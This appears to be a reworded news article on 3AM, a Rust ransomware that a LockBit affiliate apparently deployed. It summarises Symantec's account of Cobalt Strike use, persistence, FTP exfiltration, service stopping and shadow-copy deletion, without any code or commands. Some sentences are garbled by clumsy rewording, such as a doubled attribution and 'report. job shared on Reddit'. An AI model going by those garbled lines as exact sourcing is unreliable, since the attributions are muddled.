A new ransomware family called 3 a.m. emerged into the wild after being detected in a single incident in which an unidentified affiliate deployed the strain following a failed attempt to deploy LockBit (aka Bitwise Spider or Hoverfly) in the target network.
“3AM is written in Rust and appears to be a completely new malware family,” said the Symantec Threat Hunter team, part of Broadcom. said in a report shared with The Hacker News.
“The ransomware attempts to stop several services on the infected computer before starting to encrypt files. Once encryption is complete, it attempts to delete Volume Shadow (VSS) copies.”
3AM gets its name because it is referenced in the ransom note. It also adds encrypted files with .troisamtime extension. That said, it is currently unclear whether the malware authors have any ties to known cybercrime groups.
In the attack spotted by Symantec, the adversary allegedly managed to deploy the ransomware on three machines on the organization’s network, only to be blocked on two of those machines.
The intrusion is distinguished by the use of Cobalt Strike for post-exploitation and privilege escalation, followed by the execution of reconnaissance commands to identify other servers for lateral movement. The exact entry route used in the attack is unclear.
“They also added a new user for persistence and used the Wput tool to exfiltrate victims’ files to their own FTP server,” Symantec noted.
A 64-bit executable written in Rust, 3AM is designed to execute a series of commands to stop various security and backup-related software, encrypt files matching predefined criteria, and purge volume shadow copies.
Identity is the New Endpoint: Mastering SaaS Security in the Modern Age
Dive into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Find out why identity is the new endpoint. Reserve your place now.
Although the exact origins of the ransomware remain unknown, there is evidence that the ransomware subsidiary linked to the operation targets other entities, according to a report. job shared on Reddit on September 9, 2023.
“Ransomware affiliates have become increasingly independent from ransomware operators,” Symantec said.
“New ransomware families appear frequently and most disappear just as quickly or never gain traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may be of interest to attackers and may be revisited in the future.”